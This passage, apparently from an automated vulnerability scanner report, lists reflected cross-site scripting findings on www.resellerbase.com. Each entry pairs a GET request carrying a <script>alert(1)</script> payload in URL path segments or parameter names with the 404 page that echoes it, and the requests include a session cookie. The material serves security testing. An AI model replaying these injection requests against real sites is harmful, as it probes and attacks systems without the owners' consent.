Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d26e9<script>alert(1)</script>2889c8b395f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced26e9<script>alert(1)</script>2889c8b395f/other/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced26e9<script>alert(1)</script>2889c8b395f/other/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5132. http://www.resellerbase.com/web-service/other/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7c89<script>alert(1)</script>c7d4ea56946 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherf7c89<script>alert(1)</script>c7d4ea56946/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherf7c89<script>alert(1)</script>c7d4ea56946/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5133. http://www.resellerbase.com/web-service/other/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11bb8<script>alert(1)</script>43f4b87fb0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes11bb8<script>alert(1)</script>43f4b87fb0a/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.5134. http://www.resellerbase.com/web-service/other/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f863<script>alert(1)</script>b171899044e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos7f863<script>alert(1)</script>b171899044e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos7f863<script>alert(1)</script>b171899044e/ was not found on this server.</p>
...[SNIP]...

2.5135. http://www.resellerbase.com/web-service/other/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60822<script>alert(1)</script>c9cf4c3b983 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/?60822<script>alert(1)</script>c9cf4c3b983=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/?60822<script>alert(1)</script>c9cf4c3b983=1 was not found on this server.</p>
...[SNIP]...

2.5136. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c6cf<script>alert(1)</script>0b7e70c7920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service7c6cf<script>alert(1)</script>0b7e70c7920/other/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service7c6cf<script>alert(1)</script>0b7e70c7920/other/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5137. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d6e9c<script>alert(1)</script>8df049c19d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherd6e9c<script>alert(1)</script>8df049c19d8/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherd6e9c<script>alert(1)</script>8df049c19d8/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5138. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2390<script>alert(1)</script>88c2a7b382c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesd2390<script>alert(1)</script>88c2a7b382c/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesd2390<script>alert(1)</script>88c2a7b382c/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5139. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95225<script>alert(1)</script>14e88576b5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos95225<script>alert(1)</script>14e88576b5f/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos95225<script>alert(1)</script>14e88576b5f/images/ was not found on this server.</p>
...[SNIP]...

2.5140. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41119<script>alert(1)</script>08a4d5d9a3d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images41119<script>alert(1)</script>08a4d5d9a3d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images41119<script>alert(1)</script>08a4d5d9a3d/ was not found on this server.</p>
...[SNIP]...

2.5141. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1a744<script>alert(1)</script>f24050b77cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/?1a744<script>alert(1)</script>f24050b77cc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/?1a744<script>alert(1)</script>f24050b77cc=1 was not found on this server.</p>
...[SNIP]...

2.5142. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee2f7<script>alert(1)</script>9da76e04483 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceee2f7<script>alert(1)</script>9da76e04483/other/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceee2f7<script>alert(1)</script>9da76e04483/other/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5143. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39fc8<script>alert(1)</script>17e23bae8fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other39fc8<script>alert(1)</script>17e23bae8fc/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other39fc8<script>alert(1)</script>17e23bae8fc/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5144. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55c54<script>alert(1)</script>2597c0138ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes55c54<script>alert(1)</script>2597c0138ae/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes55c54<script>alert(1)</script>2597c0138ae/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5145. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a3862<script>alert(1)</script>12c73a6c1ae was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmosa3862<script>alert(1)</script>12c73a6c1ae/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmosa3862<script>alert(1)</script>12c73a6c1ae/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5146. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9e83d<script>alert(1)</script>aa94aed3e72 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images9e83d<script>alert(1)</script>aa94aed3e72/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images9e83d<script>alert(1)</script>aa94aed3e72/rating/ was not found on this server.</p>
...[SNIP]...

2.5147. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e34f6<script>alert(1)</script>36444e72647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/ratinge34f6<script>alert(1)</script>36444e72647/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/ratinge34f6<script>alert(1)</script>36444e72647/ was not found on this server.</p>
...[SNIP]...

2.5148. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 51f06<script>alert(1)</script>8b8fd72d390 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/?51f06<script>alert(1)</script>8b8fd72d390=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/?51f06<script>alert(1)</script>8b8fd72d390=1 was not found on this server.</p>
...[SNIP]...

2.5149. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da41e<script>alert(1)</script>b6a3c66aae8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceda41e<script>alert(1)</script>b6a3c66aae8/other/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceda41e<script>alert(1)</script>b6a3c66aae8/other/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5150. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89eb3<script>alert(1)</script>a4c843c4409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other89eb3<script>alert(1)</script>a4c843c4409/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other89eb3<script>alert(1)</script>a4c843c4409/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5151. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/images/rating/0.gif

